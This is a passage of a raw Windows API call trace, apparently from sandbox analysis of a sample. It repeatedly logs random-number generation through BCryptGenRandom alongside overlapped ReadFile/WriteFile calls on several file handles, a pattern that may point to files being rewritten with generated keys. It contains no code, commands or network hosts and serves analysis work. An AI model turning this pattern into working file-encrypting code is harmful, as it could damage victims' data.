_Size=0x4) returned 0x1fa2ed8 [0179.373] free (_Block=0x1fa91d0) [0179.373] free (_Block=0x1fa2ed8) [0179.373] free (_Block=0x1fa90b8) [0179.373] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0179.373] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0179.509] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x9e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0179.509] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0179.515] CloseHandle (hObject=0x2a8) returned 1 [0179.516] free (_Block=0x3f70048) [0179.516] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0179.521] CloseHandle (hObject=0x338) returned 1 [0179.521] free (_Block=0x3e70008) [0179.521] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0179.532] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.532] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0179.533] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.533] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0179.533] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.533] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.533] free (_Block=0x3e305b8) [0179.533] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.533] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.533] free (_Block=0x1fa91d0) [0179.534] free (_Block=0x1fa2ed8) [0179.534] free (_Block=0x1fa90b8) [0179.534] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0179.534] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0179.537] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4e10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0179.537] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0179.546] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x228c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0179.553] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0179.559] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x9fc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0179.559] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0179.672] CloseHandle (hObject=0x2a4) returned 1 [0179.672] free (_Block=0x3df0008) [0179.672] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0179.673] CloseHandle (hObject=0x2a8) returned 1 [0179.673] free (_Block=0x1ff1e60) [0179.673] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0179.689] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x6cc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0179.689] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0179.700] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.700] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.701] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0179.701] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.701] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.701] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0179.701] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.701] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.701] free (_Block=0x3e305b8) [0179.701] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.701] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.702] free (_Block=0x1fa91d0) [0179.702] free (_Block=0x1fa2ed8) [0179.702] free (_Block=0x1fa90b8) [0179.702] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0179.702] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0179.702] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0179.702] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0179.715] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x7c50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0179.716] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0179.721] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.721] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0179.721] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.722] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0179.722] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.722] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.722] free (_Block=0x3e305b8) [0179.722] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.722] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.723] free (_Block=0x1fa91d0) [0179.723] free (_Block=0x1fa2ed8) [0179.723] free (_Block=0x1fa90b8) [0179.723] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0179.723] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0179.732] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x1800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0179.732] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0179.737] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x342e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0179.738] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0179.744] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.744] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.745] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0179.745] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.745] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.745] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0179.745] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.745] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.745] free (_Block=0x3e305b8) [0179.745] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.745] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.746] free (_Block=0x1fa91d0) [0179.746] free (_Block=0x1fa2ed8) [0179.746] free (_Block=0x1fa90b8) [0179.746] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0179.746] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0179.767] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.768] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0179.768] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.768] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0179.768] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.768] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.769] free (_Block=0x3e305b8) [0179.769] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.769] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.769] free (_Block=0x1fa91d0) [0179.769] free (_Block=0x1fa2ed8) [0179.769] free (_Block=0x1fa90b8) [0179.769] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0179.769] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0179.770] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0179.770] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0180.451] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0180.451] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0180.460] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0180.460] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0180.462] CloseHandle (hObject=0x338) returned 1 [0180.465] free (_Block=0x3f70048) [0180.465] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0181.051] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x4a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0181.051] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0181.063] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0181.063] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0181.077] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x304, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0181.077] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0181.093] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0xe44, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0181.094] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0181.108] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x446, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0181.109] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0181.120] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.121] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0181.121] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.121] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0181.122] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0181.122] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0181.122] free (_Block=0x3e305b8) [0181.122] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0181.122] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0181.122] free (_Block=0x1fa91d0) [0181.122] free (_Block=0x1fa2ed8) [0181.122] free (_Block=0x1fa90b8) [0181.123] WriteFile (in: hFile=0x170, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0181.123] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0183.674] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0183.674] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0183.686] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.687] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.687] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0183.687] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.687] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.687] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0183.688] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0183.688] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0183.688] free (_Block=0x3e305b8) [0183.688] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0183.688] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0183.688] free (_Block=0x1fa91d0) [0183.688] free (_Block=0x1fa2ed8) [0183.688] free (_Block=0x1fa90b8) [0183.688] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0183.689] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0183.697] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.697] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.697] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0183.697] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.698] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.698] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0183.698] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0183.698] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0183.698] free (_Block=0x3e305b8) [0183.698] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0183.698] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0183.699] free (_Block=0x1fa91d0) [0183.699] free (_Block=0x1fa2ed8) [0183.699] free (_Block=0x1fa90b8) [0183.699] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0183.699] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0184.521] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x2320, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0184.521] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0184.527] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.528] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0184.528] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.528] 